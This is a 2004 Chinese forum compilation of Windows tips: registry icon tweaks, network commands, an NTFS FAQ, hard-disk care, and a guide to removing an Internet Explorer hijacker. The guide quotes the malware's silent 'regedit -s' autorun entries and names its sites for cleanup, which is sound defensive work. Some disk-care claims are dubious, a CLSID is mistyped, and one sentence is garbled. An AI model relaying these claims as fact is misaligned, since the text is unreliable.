路 径:HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\DefaultIcon
键值名称:"默认"
键 值:将右边的（默认）改成你的图标文件名（包含路径）。
作 用:更改"我的电脑"图标的提示信息
路 径:HKEY_CLASSES_ROOT\CLSID\{20D0FE0-3AEA-1069-A2D8-08002B3030D9}
键值名称:InfoTip
键 值:修改键值内容
作 用:给"回收站"改名、改图标
路 径:HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}
键值名称:"默认"
键 值:把"回收站"改为其它名称。
作 用:修改系统文件夹的图标
路 径:HKEY_CLASSES_ROOT\CLSID\系统文件夹的ID
键值名称efaultIcon
键 值:缺省数据修改为你喜欢的图标所在的位置。
作 用:快捷方式图标上的箭头
路 径:HKEY_CLASSES_ROOT\lnkfile、HKEY_CLASSES_ROOT\piffile
键值名称:删除IsShortCut键值
作 用:BMP文件的图标为该文件的略图浏览
路 径:HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon
键值名称:"默认"
键 值:键值改为"%1"
作 用:改变图标大小
路 径:HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics
键值名称:"Shell Icon Size"
键 值:改变其值即改变图标大小，缺省值为"32"
作 用:高彩色显示图标
路 径:HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics
键值名称:"Shell Icon BPP"
键 值:设其值为"16"
作 用:更改图标的间距
路 径:HKEY_CURRENT_USER\Control Panel\desktop\WindowMetrics
键值名称:IconSpacing和IconVerticalSpacing
数据类型:
键 值:修改值可以更改图标的间距。
备 注:两个键值用于设定图标的水平和垂直间距，其绝对值越大间距越大。
作 用:更改桌面图标的大小
路 径:HKEY_CURRENT_USER\Control Panel\desktop\WindowMetrics
键值名称:Shell Icon Size
数据类型:
键 值:修改值可以更改桌面上图标的大小。
作 用:让图标的色彩更鲜艳
路 径:HKEY_CURRENT_USER\Control Panel\desktop\WindowMetrics
键值名称:新建"Shell Icon BPP"
数据类型:
键 值:输入16(16-bit)或24(24-bit)。
作 用:删除桌面上的Internet Explorer图标
路 径:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
键值名称:NoInternetIcon
数据类型:
键 值:值设为0，可以关闭这些功能；设置为1，可以激活它

--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:28　　 标题: 整理了七个小时的东东！[申请加精]

二十三。★★★windows中有关网络的几命令
1.Ping
    适用环境：WIN95/98/2000/NT
    使用格式：ping [-t] [-a] [-n count] [-l size]
    参数介绍：
    -t 让用户所在的主机不断向目标主机发送数据
    -a 以IP地址格式来显示目标主机的网络地址
    -n count 指定要ping多少次，具体次数由后面的count来指定
    -l size 指定发送到目标主机的数据包的大小
    主要功能：用来测试一帧数据从一台主机传输到另一台主机所需的时间，从而判断主响应时间。
    详细介绍：
    该命令主要是用来检查路由是否能够到达，由于该命令的包长非常小，所以在网上传递的速度非常快，可以快速地检测你要去的站点是否可达，一般你在去某一站点时可以先运行一下该命令看看该站点是否可达。如果执行Ping不成功，则可以预测故障出现在以下几个方面：网线是否连通，网络适配器配置是否正确，IP地址是否可用等；如果执行Ping成功而网络仍无法使用，那么问题很可能出在网络系统的软件配置方面，Ping成功只能保证当前主机与目的主机间存在一条连通的物理路径。它的使用格式是在命令提示符下键入：Ping　IP地址或主机名，执行结果显示响应时间，重复执行这个命令，你可以发现Ping报告的响应时间是不同的。具体的ping命令后还可跟好多参数，你可以键入ping后回车其中会有很详细的说明。
    举例说明：
    当我们要访问一个站点例如www.chinayancheng. net时，就可以利用Ping程序来测试目前连接该网站的速度如何。执行时首先在Windows 9x系统上，单击“开始”键并选择运行命令，接着在运行对话框中输入Ping和用户要测试的网址，例如ping www.chinayan- cheng.net，接着该程序就会向指定的Web网址的主服务器发送一个32字节的消息，然后，它将服务器的响应时间记录下来。Ping程序将会向用户显示4次测试的结果。响应时间低于300毫秒都可以认为是正常的，时间超过400毫秒则较慢。出现“请求暂停（Request time out）”信息意味着网址没有在1秒内响应，这表明服务器没有对Ping做出响应的配置或者网址反应极慢。如果你看到4个“请求暂停”信息，说明网址拒绝Ping请求。因为过多的Ping测试本身会产生瓶颈，因此，许多Web管理员不让服务器接受此测试。如果网址很忙或者出于其他原因运行速度很慢，如硬件动力不足，数据信道比较狭窄，过一段时间可以再试一次以确定网址是不是真的有故障。如果多次测试都存在问题，则可以认为是用户的主机和该网址站点没有联接上，用户应该及时与因特网服务商或网络管理员联系。
    2.winipcfg
    适用环境：WIN95/98/2000
    使用格式：winipcfg [/?] [/all]
    参数介绍：
    /? 显示winipcfg的格式和参数的英文说明
    /all 显示所有的有关IP地址的配置信息
    主要功能：显示用户所在主机内部的IP协议的配置信息
    详细介绍：
    winipcfg程序采用windows窗口的形式来显示IP协议的具体配置信息，如果winipcfg命令后面不跟任何参数直接运行，程序将会在窗口中显示网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等，还可以查看主机的相关信息如：主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。在命令提示符下键入winipcfg／？可获得winipcfg的使用帮助，键入winipcfg／all可获得IP配置的所有属性。
    举例说明：
    如果我们想很快地了解某一台主机的IP协议的具体配置情况，可以使用winipcfg命令来检测。其具体操作步骤如下：在“运行”对话框中，直接输入winipcfg命令，接着按一下回车键，我们就会看到一个界面。在该界面中，我们了解到目前笔者所在的计算机是用的3COM类型的网卡，网卡的物理地址是00-60-08-07-95-14，主机的IP地址是210.73.140.13，子网掩码是255.255.255.192，路由器的地址是210.73.140.1，如果用户想更加详细地了解该主机的其他IP协议配置信息，例如DNS服务器、DHCP服务器等方面的信息，可以直接单击该界面中的“详细信息”按钮。
3.tracert
    适用环境：WIN95/98/2000/NT
    使用格式：tracert [-d] [-h maximum_hops] [-j host_list] [-w timeout]
    参数介绍：
    -d 不解析目标主机的名字
    -h maximum_hops 指定搜索到目标地址的最大跳跃数
    -j host_list 按照主机列表中的地址释放源路由
    -w timeout 指定超时时间间隔，程序默认的时间单位是毫秒
    主要功能：判定数据包到达目的主机所经过的路径、显示数据包经过的中继节点清单和到达时间。
    详细介绍：
    这个应用程序主要用来显示数据包到达目的主机所经过的路径。该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令：tracert 主机IP地址或主机名。执行结果返回数据包到达目的主机前所经历的中继站清单，并显示到达每个中继站的时间。该功能同ping命令类似，但它所看到的信息要比ping命令详细得多，它把你送出的到某一站点的请求包，所走的全部路由都告诉你，并且通过该路由的ip是多少，通过该ip的时延是多少。具体的tracert命令后还可跟好多参数，大家可以键入tracert后回车，其中会有很详细的说明。
    举例说明：
    要是大家想要了解自己的计算机与目标主机之间详细的传输路径信息，可以使用tracert命令来检测一下。其具体操作步骤如下：在“运行”对话框中，直接输入tracert [url]www.chinayancheng.net命令，接着单击一下回车键，我们就会看到一个界面；当然大家也可以在MS-DOS方式下，输入tracert www.chinayancheng.net命令，同样也能看到结果画面。在该画面中，我们可以很详细地跟踪连接到目标网站www.chinayancheng.net的路径信息，例如中途经过多少次信息中转，每次经过一个中转站时花费了多长时间，通过这些时间，我们可以很方便地查出用户主机与目标网站之间的线路到底是在什么地方出了故障等情况。如果我们在tracert命令后面加上一些参数，还可以检测到其他更详细的信息，例如使用参数－d，可以指定程序在跟踪主机的路径信息时，同时也解析目标主机的域名。
    4.netstat
    适用环境：WIN95/98/2000/NT
    使用格式：netstat [-r] [-s] [-n] [-a]
    参数介绍：
    -r 显示本机路由标的内容
    -s 显示每个协议的使用状态（包括TCP协议、UDP协议、IP协议）
    -n 以数字表格形式显示地址和端口
    -a 显示所有主机的端口号
    主要功能：该命令可以使用户了解到自己的主机是怎样与因特网相连接的。
    详细介绍：
    netstat程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息，例如显示网络连接、路由表和网络接口信息，可以让用户得知目前总共有哪些网络连接正在运行。我们可以使用netstat／？命令来查看一下该命令的使用格式以及详细的参数说明，该命令的使用格式是在DOS命令提示符下或者直接在运行对话框中键入如下命令：netstat［参数］，利用该程序提供的参数功能，我们可以了解该命令的其他功能信息，例如显示以太网的统计信息，显示所有协议的使用状态，这些协议包括TCP协议、UDP协议以及IP协议等，另外还可以选择特定的协议并查看其具体使用信息，还能显示所有主机的端口号以及当前主机的详细路由信息。
    举例说明：
    如果我们想要了解盐城市信息网络中心节点的出口地址、网关地址及主机地址等信息的话，可以使用netstat命令来查询。具体操作方法如下：在“运行”对话框中，直接输入netstat命令，接着单击一下回车键，我们就会看到一个界面；当然大家也可以在MS-DOS方式下，输入netstat命令。在界面中，我们可以了解到用户所在的主机采用的协议类型、当前主机与远端相连主机的IP地址以及它们之间的连接状态等信息
--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:29　　 标题: 整理了七个小时的东东！[申请加精]

二十四。★★★NTFS和FAT分区的问答
解决：
1、什么是ntfs－新(n)技术(t)文件(f)系统(s)？
想要了解ntfs，我们首先应该认识一下fat。fat(file allocation table)是“文件分配表”的意思。对我们来说，它的意义在于对硬盘分区的管理。fat16、fat32、
ntfs是目前最常见的三种文件系统。
fat16：我们以前用的dos、windows 95都使用fat16文件系统，现在常用的windows 98/2000/xp等系统均支持fat16文件系统。它最大可以管理大到2gb的分区，但每个分区最多只能有65525个簇（簇是磁盘空间的配置单位）。随着硬盘或分区容量的增大，每个簇所占的空间将越来越大，从而导致硬盘空间的浪费。
fat32：随着大容量硬盘的出现，从windows 98开始，fat32开始流行。它是fat16的增强版本，可以支持大到2tb（2048gb)的分区。fat32使用的簇比fat16小，从而有效地节约了硬盘空间。ntfs：微软windows nt内核的系列操作系统支持的、一个特别为网络和磁盘配额、文件加密等管理安全特性设计的磁盘格式。随着以nt为内核的windows 2000/xp的普及，很多个人用户开始用到了ntfs。ntfs也是以簇为单位来存储数据文件，但ntfs中簇的大小并不依赖于磁盘或分区的大小。簇尺寸的缩小不但降低了磁盘空间的浪费，还减少了产生磁盘碎片的可能。ntfs支持文件加密管理功能，可为用户提供更高层次的安全保证。

2、什么系统可以支持ntfs文件系统？
只有windows nt/2000/xp才能识别ntfs系统，windows 9x/me以及dos等操作系统都不能支持、识别ntfs格式的磁盘。由于dos系统不支持ntfs系统，所以最好不要将c:盘制作为ntfs系统，这样在系统崩溃后便于在dos系统下修复。
ntfs与操作系统支持情况如下：
fat16　windows 95/98/me/nt/2000/xp unix，linux，dos
fat32　windows 95/98/me/2000/xp
ntfs　 windows nt/2000/xp

3、我们需要ntfs吗？
windows 2000/xp在文件系统上是向下兼容的，它可以很好地支持fat16/fat32和ntfs，其中ntfs是windows nt/2000/xp专用格式，它能更充分有效地利用磁盘空间、支持文件级压缩、具备更好的文件安全性。如果你只安装windows 2000/xp，建议选择ntfs文件系统。如果多重引导系统，则系统盘（c盘）必须为fat16或fat32，否则不支持多重引导。当然，其他分区的文件系统可以为ntfs。

4、如何将fat分区转换为ntfs？
windows 2000/xp提供了分区格式转换工具“convert.exe”。convert.exe是windows 2000附带的一个dos命令行程序，通过这个工具可以直接在不破坏fat文件系统的前提下，将fat转换为ntfs。它的用法很简单，先在windows 2000环境下切换到dos命令行窗口，在提示符下键入：d:\>convert 需要转换的盘符 /fs:ntfs。如系统e盘原来为fat16/32，现在 需要转换为ntfs，可使用如下格式：d:\>convert e: /fs:ntfs。所有的转换将在系统重新启动后完成。本人极力推荐使用此法进行转换!速度奇快。

    此外，你还可以使用专门的转换工具，如著名的硬盘无损分区工具powerquest partition magic 7.0，软件下载页面http://soft.km169.net/soft/html/1964.htm使用它完成磁盘文件格式的转换也是非常容易的。首先在界面中的磁盘分区列表中选择需要转换的分区。从界面按钮条中选择“convert partition”按钮，或者是从界面菜单条“operations”项下拉菜单中选择“convert”命令。激活该项功能界面。在界面中选择转换输出为“ntfs”，之后单击“ok”按钮返回程序主界面。单击界面右下角的“apply”添加设置。此后系统会重新引导启动，并完成分区格式的转换操作。

5、如何在ntfs格式分区下找回意外删除丢失的文件？
你可以使用专门的软件，如final data for ntfs，或者是get data back for ntfs 1.04。这两个软件的文件恢复效果都不错。本人推荐使用get data back for fat
1.05/ntfs 1.04（是2个软件），下载地址
http://download-tipp.de/cgi-bin/suchen.cgi?mh=10&;query=support_europe@runtime.org&type=phrase&bool=and。如果在文件删除后没有任何文件操作，恢复率接近100%。所以不要等到文件删除后才安装这个软件，最好是与windows系统一起安装，并在出现文件误删除后立刻执行恢复操作，一般可以将删除的文件恢复回来。
6、如果windows 2000/xp安装在c盘（ntfs格式），当windows崩溃时在dos状态下不能进入c盘，怎么办？
你可以使用windows 2000/xp的安装光盘启动来修复windows，或者是制作windows 2000/xp的安装启动应急盘。注意：windows 2000的安装盘制作程序在程序的安装光盘中，而windows xp的应急盘制作是独立提供的，需要从微软的网站下载。

7、final data for ntfs或get data back for ntfs可以修复被意外格式化的硬盘吗？
这两个软件都可以恢复格式化删除的数据（低级格式化除外）。常规格式化删除的只是数据信息，低级格式化则删除全部数据区，当硬盘技术还不像现在这样发达的时候，磁盘表面很容易磨损。硬盘使用者对经常出现的读错误，往往采用低级格式化。修复被格式化的硬盘，只能将这个硬盘拆下来，安装到其他的计算机中，之后执行文件修复操作。final data甚至可以修复由cih病毒破坏的硬盘。

8、windows 98(fat系统)下如何直接读写ntfs文件系统
    当电脑安装有windows 98和windows 2000/xp两个操作系统，如何在fat系统下直接读写ntfs文件系统？虽然fat系统可以转换为ntfs系统，但是有时我们需要在机器中同时安装windows 98和windows 2000/xp。此时的麻烦就来了，由于windows 98不能读取windows 2000的ntfs，那么如何进行数据交换呢？实际上我们只需要使用一个小小的软件ntfs for windows 98就可以让windows 98轻松读取、甚至写入ntfs分区。首先，到
该工具的下载网址http://down.hothost.com/list.asp?id=514下载ntfs for windows 98　1.07版(能读写!)。解压缩后，请把cr整个目录（里边有7个读取ntfs文件系统必须使用到windows 2000/xp的系统文件，其它3个是注释文件）copy到c盘（也可改名为ntfs＿files，我是这样改的），安装结束后会出现一个配置界面，在该界面中的“ntfs system files”项中需要设置的是程序可以借用的windows 2000/xp系统的相关文件保存路径，你就选择刚才copy到盘的cr目录即可，然后其它什么都不必去操作，到此设置完成，单击ok按钮保存设置并退出。重启后就可以在windows 98下访问ntfs分区了！经过实际使用，证明安装此软件后，在ntfs分区上能读、写！以上内容本人在win98se＋winxp＿procn＋winxp＿proen及winme＋winxp＿procn＋winxp＿proen上验证通过！（2台机）
下面的内容仅供参考，建议你不要实施，至少我是这样做的。 "drive letter assignments”项中提供的设置是设置允许可以识别的ntfs分区盘符，设置的依据可以参考在windows 2000/xp下的盘符顺序。如果单击界面中的“advanced”按钮，在关联界面中提供了针对设置的ntfs分区高级设置，其中包括设置为只读属性“read-only”、允许写入“write-through”。对于检查点间隔“checkpoint interval”和写回间隔“writeback nterval”，使用程序提供的默认设置即可。

9、如何在dos系统下直接读写ntfs文件系统?
    winternals software lp 公司提供了工具软件解决了这个问题。用一张ms-dos启动盘就可以作到以前不可能作到的事，修改，删除，更新 ntfs上的文件，实际
ntfsdos pro 是在 windows nt 出问题时的一个修复工具。http://soft.winzheng.com/searchengine.asp，键入“ntfs”查找该站软件，就可以找出ntfsdos　pro　4.0，最好选择服务器2下载。具体安装过程并不复杂，按照提示做好启动盘即可。

    10、在ntfs系统下，如何保护自己的文件、文件夹？
由于ntfs文件分区格式具有良好的安全性，如果你不希望自己在硬盘中的文件被其他人调用或查看，使用权限控制方式加密是非常有效的方法。设置方法非常简单：以系统管理员身份登录，使用鼠标右键单击需要加密的文件夹，选择“properties”，切换到“security”选项卡。在“group of user names”项中设置允许访问的用户只有administrator和自己。删除其他的所有用户。保存设置退出即可。此后，其他用户将不能访问该文件夹。使用这项功能需要注意的是：一定要保证只有你一个人知道administrator密码，并且设置其他用户不能属于administrator。此外，你还可以详细的给每个用户设置权限，包括设置读取权限、写入权限、删除权限等，这样使用起来就更加灵活。你还可以设置权限，控制一个磁盘，或者磁盘分区只为自己使用，这样其他人就不能看到你的任何东西了。

--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:30　　 标题: 整理了七个小时的东东！[申请加精]

二十五。★★★六大软件伤硬盘
硬盘是计算机中最重要的存储介质，关于硬盘的维护保养，相信每个电脑用户都有所了解。不过，以前的很多文章都是针对拨号时代的单机用户，在宽带逐渐普及、大硬盘不断降价的今天，很多人一打开电脑就会让硬盘满负荷运转：看高清晰的DVDRip影片、进行不间断的BT下载、使用Windows的系统还原功能……不过，你可能并不清楚，这些新软件带来的新的应用模式，会给硬盘带来新的伤害！
    新应用模式带来的隐患
    1.编码错误的DVDRip
    现在网上由DVD转录压缩的DVDRip格式的影片相当受欢迎。这种格式的影片清晰度和DVD相差无几，但下载一部影片只有700MB~1.3GB大小，因此很多用户喜欢将DVDRip格式的影片下载到硬盘上慢慢欣赏。不过，播放这种格式的影片对系统有较高的要求：除了CPU、显卡要求足够强劲以保证播放流畅外，硬盘负荷也非常大——因为播放DVDRip就是一个不断解码解压缩，再输送到显示系统的过程。笔者发现，在遇到有编码错误的DVDRip文件时，Windows会出现磁盘占用率非常高的现象：系统不断想要把编码转换为视频信号，但编码错误的文件索引和相应的信号段是不匹配的——此时，硬盘灯会不断地闪烁，整个系统对用户的操作响应极慢，用户点击菜单但几乎没有反应。如果编码错误较多，系统有时候甚至会死机。很多用户在此时非常不耐烦，直接按下机箱上的RESET键甚至是直接关闭计算机电源，在硬盘磁头没有正常复位的情况下，这种操作相当危险！
    提示：Windows XP的用户需要特别注意，当我们在Windows XP中自动预览一些体积较大的ASF、WMV等文件时，虽然没有进行正式播放，但也会出现计算机速度突然变慢、硬盘灯不断闪烁等现象，其罪魁祸首仍然是视频文件错误编码！
    2. Bittorrent下载
    Bittorrent下载是宽带时代新兴的P2P交换文件模式，各用户之间共享资源，互相当种子和中继站，俗称BT下载。由于每个用户的下载和上传几乎是同时进行，因此下载的速度非常快。不过，它会将下载的数据直接写进硬盘(不像FlashGet等下载工具可以调整缓存，到指定的数据量后才写入硬盘)，因此对硬盘的占用率比FTP下载要大得多！
    此外，BT下载事先要申请硬盘空间，在下载较大的文件的时候，一般会有2~3分钟时间整个系统优先权全部被申请空间的任务占用，其他任务反应极慢。有些人为了充分利用带宽，还会同时进行几个BT下载任务，此时就非常容易出现由于磁盘占用率过高而导致的死机故障。
    因此，除非你的电脑硬件配置相当高(尤其是内存，至少要在256MB以上)，否则在BT下载作出改进以前，如果要进行长时间、多任务的下载应用，最好还是采用传统的FTP软件。
    3. PQMAGIC转换的危险
    PQMAGIC是大名鼎鼎的分区魔术师，能在不破坏数据的情况下自由调整分区大小及格式。不过，PQMAGIC刚刚推出的时候，一般用户的硬盘也就2GB左右，而现在60~80GB的硬盘已是随处可见，PQMAGIC早就力不从心了：调整带数据的、5GB以上的分区，通常都需要1小时以上！
    除了容量因素影响外，PQMAGIC调整硬盘分区时，大量的时间都花在校验数据和检测硬盘上，可以看出，在这种情况下“无损分区”是很难保证的：由于转换的速度很慢，耗时过长，转换调整过程中，很容易因为计算机断电、死机等因素造成数据丢失。这种损失通常是一个或数个分区丢失，或是容量变得异常，严重时甚至会导致整个硬盘的数据无法读取。
    4.硬盘保护软件造成的异常
    容易造成硬盘异常的，还有硬盘保护软件。比如“还原精灵”，由于很多人不注意在重装系统或是重新分区前将它正常卸载，往往会发生系统无法完全安装等情况。此时再想安装并卸载“还原精灵”，却又提示软件已经安装，无法继续，陷入死循环中。这种故障是由于“还原精灵”接管了INT13中断，在操作系统之前就控制了硬盘的引导，用FDISK/MBR指令也无法解决。本来这只是软件的故障，但很多人经验不足，出了问题会找各种分区工具“试验”，甚至轻率地低级格式化，在这样的折腾之下，硬盘很可能提前夭折！
    5.频繁地整理磁盘碎片
    磁盘碎片整理和系统还原本来是Windows提供的正常功能，不过如果你频繁地做这些操作，对硬盘是有害无利的。磁盘整理要对硬盘进行底层分析，判断哪些数据可以移动、哪些数据不可以移动，再对文件进行分类排序。在正式安排好硬盘数据结构前，它会不断随机读取写入数据到其他簇，排好顺序后再把数据移回适当位置，这些操作都会占用大量的CPU和磁盘资源。其实，对现在的大硬盘而言，文档和邮件占用的空间比例非常小，多数人买大硬盘是用来装电影和音乐的，这些分区根本无需频繁整理——因为播放多媒体文件的效果和磁盘结构根本没有关系，播放速度是由显卡和CPU决定的。
    6. Windows XP的自动重启
    Windows XP的自动重启功能可以自动关闭无响应的进程，自动退出非法操作的程序，从而减少用户的操作步骤。不过，这个功能也有一个很大的问题：它会在自动重新启动前关闭硬盘电源，在重新启动机器的时候再打开硬盘电源！这样一来，硬盘在不到10秒的时间间隔内，受到电流两次冲击，很可能会发生突然“死亡”的故障。为了节省一些能源设置成让系统自动关闭硬盘，对硬盘来说也是弊大于利的。
    消除隐患的应对方案
    1.解决编码错误
    遇到编码错误的视频文件，最好的方法是通过正常途径向系统发出关机或重新启动指令，耐心等待系统自己处理完毕后重新启动计算机。然后上网搜索一些专门修复编码错误的软件来修复这些影片，再进行观看。
    2.加大系统缓存
    对于像BT这种线程没优化好、同时读取和写入硬盘的软件，如果一定要使用，可以通过修改注册表的方式加大磁盘缓冲，以减小硬盘读写的频率。以Windows XP为例：
    单击“开始”、“运行”，键入“Regedit”后回车，打开注册表编辑器。依次展开HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\SESSION MANAGER\MEMORY MANAGEMENT分支，在右侧窗口中单击鼠标右键，选择“新建”、“DWORD”值，将新值命名为“Iopagelocklimit”，并将其值设置为“4000”(16进制，即16M或“8000”(即32M，这样硬盘的读写频率会降低不少。对于BT造成的CPU占用率过高问题，可以通过调节任务的优先级来解决：在Windows 2000/XP下同时按下“Ctrl+Alt+Delete”组合键，选择“任务管理器”，然后单击“进程”选项卡，用鼠标右键单击“Btdownloadgui.exe”，选择“设置优先级”下低于“标准”的一个级别即可。不庋鹘谟惺被嵋養T非法操作退出。
    3.巧妙卸载“还原精灵”
    如果你的计算机安装了“还原精灵”，但在重装系统前忘记了正确卸载“还原精灵”，导致无法分区及安装系统，那么可尝试使用以下方法来解决问题：启动计算机后在系统引导前按“Ctrl+Home”组合键，调出“还原精灵”的菜单，输入密码进去后，选择“卸载”即可。也可以在光驱中放入“还原精灵”安装光盘，找到卸载程序Uninst.exe并执行它，当出现“不能运行在……要重新启动计算机吗？”的提示时，单击“确定”，重新启动后再安装“还原精灵”，然后再将它卸载。此方法在“还原精灵”5.0、2002、2003等版本上均验证通过。
    4.加速PQMAGIC的操作
    在PQMAGIC中打开“常规”选项下的“PartitionMagic优选设置”，将“忽略FAT上的OS/2 EA错误”和“跳过坏扇区检查”这两个选项均选中，忽略校验数据和检测硬盘的过程，自然会大大加快PQMAGIC的速度。当然，在使用PQMAGIC对分区进行操作之前，我们应该先用磁盘扫描工具检查和修复硬盘上的错误，然后再进行分区转换操作。
    此外，最好不要用PQMAGIC调整带数据的分区，更不要在调整分区容量时进行分区格式转换。最好的方法是将要调整的分区上的数据备份到不参与调整的分区(最好是其他硬盘上)，然后清空调整的一个或多个分区，这样转换速度会快很多，也更安全。
    5.采用NTFS格式的分区
    NTFS分区的好处在这里就不用多说了吧？由于NTFS分区本身的簇很小，不容易产生磁盘碎片，微软在文件分配表和目录索引上也作了特殊处理，万一出错后恢复文件也较容易。不过为了保证系统兼容性，最好不要将引导分区设置为NTFS格式。
    6.禁用自动重启功能
    在Windows XP中用鼠标右键单击“我的电脑”，选择“属性”，然后单击“高级”选项卡，单击“启动和故障恢复”按钮，在打开的界面中将“系统失败”下面的“自动重新启动”前的复选框清空。不过在系统遇到像显卡驱动兼容性这样严重的故障时，Windows XP还是会自动重新启动。但此时Windows XP一般会先生成一个日志文件，以便你启动后查看，此时要抓紧时间按下RESET键启动，防止Windows XP关闭硬盘。
    7.关闭硬盘节能功能
    先在BIOS中的电源选项中将硬盘节能全部设置为“DISABLED”，然后在Windows的“控制面板”、“电源选项”中，将“电源方案”下面的“关闭硬盘”、“系统待机”设置为“从不”(要让系统关机和休眠，还是手工控制好)。

--------------------------------------------------------------------------------
作者: zidiaodiao　　时间: 2004-1-7 04:31　　 标题: 整理了七个小时的东东！[申请加精]

二十六。★★★\$NtUninstallQ……\$\恶意修改网爷的解决
几天一些恶意网站的恶意代码闹得挺凶，像是www.58q.com www.qq230.com 这样欠黑的网站
一打开这些网页就中了恶意脚本，而且一般的IE修复和杀毒软件都不能比较彻底清除
典型症状：
1. IE 首页被改为恶意网站，默认主页，起始页，甚至搜索页全部被更改
2. C盘下生成文件夹：\$NtUninstallQxxxxxxx\$（x代表数字）
从名字上看企图冒充微软更新补丁的卸载文件夹，并且在Win2000/XP下拥有系统文件级隐藏属性，比较隐蔽。文件夹中包含了恶意脚本文件winsys.vbs、winsys.cer
3. 随机启动项被添加3项：

4. 如用杀毒软件查杀，可以查到名为Harm.Reg.WebImport.g 的病毒，但若是清除不彻底，只是删除了文件夹，开机将会出现提示：

清除方法小结：
1. 删除启动项：
建议通过msconfig 、优化软件禁用或注册表手动删除以上3项启动项
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Run
删除：regedit -s C:\\$NtUninstallQxxxxxxx\$\WINSYS.cer
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
删除：Sys32，值为：C:\\$NtUninstallQxxxxxxx\$\WINSYS.vbs
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
删除：Sys32，值为：regedit -s C:\\$NtUninstallQxxxxxxx\$\WINSYS.cer
删除：internat.exe，值为：internat.exe
2. 删除文件夹：
文件夹选项设置

然后删除整个\$NtUninstallQxxxxxxx\$ 目录
3. 清理注册表：
记下恶意网站的域名，以它为关键字搜索注册表或用注册表清理工具，因为恶意网站的名字会替换注册表中所有IE 默认起始页、默认搜索页、默认主页等键值。
一旦通过这种方式再次打开恶意网站，以上做的就白费了，所以清理完以前暂时不要打开IE，如需要访问某些网站，可以通过运行输入网址或收藏夹等方式访问。
根据恶意代码的内容，附上被修改的注册表键值，供参考：
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SearchURL
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\SearchURL
HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main\Search Page
HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main\Default_Search_URL
HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Main\Search Bar
HKEY_USERS\.Default\Software\Microsoft\Internet Explorer\Search\SearchAssistant
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Search\SearchAssistant
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\First Home Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Search_URL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Search Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Search Bar
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Local Page
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\Default_Page_URL
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\SearchURL
4. 清理完成后：
建议屏蔽此类网站，具体方法可以搜索以前的讨论，建议试试通过Hosts 屏蔽，嘿嘿
另外对WinXP或安装文字服务的系统，清除恶意代码后，任务栏上的输入法指示器可能消失，无法使用输入法
偶个人试验一下，在开始>运行中输入：ctfmon.exe，启动输入法指示器并加入随机启动组，一般可以解决这个问题，如果问题依旧，请开新帖讨论
补充说明：
系统文件夹（\WINNT或\Windows）下出现的如\$NtUninstallQ823980\$ 、\$NtUninstallQ814033\$ 这类文件夹是Windows Update 或安装微软补丁程序留下的卸载信息，用来卸载已安装的补丁，按补丁的编号如Q823980、Q814033 可以在微软的网站查到相应的说明。请注意与恶意代码建立的文件夹区分
如果不打算卸载已经安装的补丁，这些文件夹也是可以安全删除的


主板基础知识

《一键清理系统垃圾》

主板基础知识

主板结构

主板是电脑中最重要的部件之一，是整个电脑工作的基础，那么主板由哪些部分组成的呢？大致说来，主板由以下几个部分组成：插槽、缓存、总线、接口、BIOS、CMOS和控制芯片。

第二节、插槽

一、CPU插槽

CPU插槽当然是插CPU的地方啦！到目前为止分为Socket 7、Socket 370、Slot 1和Slot A几种。Slot 1用于PentiumⅡ、PentiumⅢ及Celeron系列。于1998年推出，现在成了最流行的插槽。Slot A用于AMD推出的Athlon(即K7)系列。它和Slot 1 几乎一样，只是左右倒转了。Socket 7用于Pentium、Pentium MMX、K5、K6系列。是较早期的CPU插槽。Socket 370用于Celeron系列。比Socket 7多了一圈引脚。因为用Solt 1来配合Celeron无法大幅度降低成本，不能攻占以AMD为首的低价计算机市场，所以Socket 370便应运而生。

二、功能卡插槽

1、ISA：ISA是基于PC／AT总线的由IEEE（美国电气电子工程师协会）1987年正式确立的标准，ISA槽是一个黑色的62＋36线插槽。

2、PCI：1993年Intel发表PCI2.0版，PCI开始走进主板，对应的PCI扩展槽是一条白色的与ISA平行的插槽。PCI有32位和64位两种，目前常用的是32位插槽。流行的扩展卡也都转移到PCI上，如显示卡、声卡、网卡、MODEM卡等。

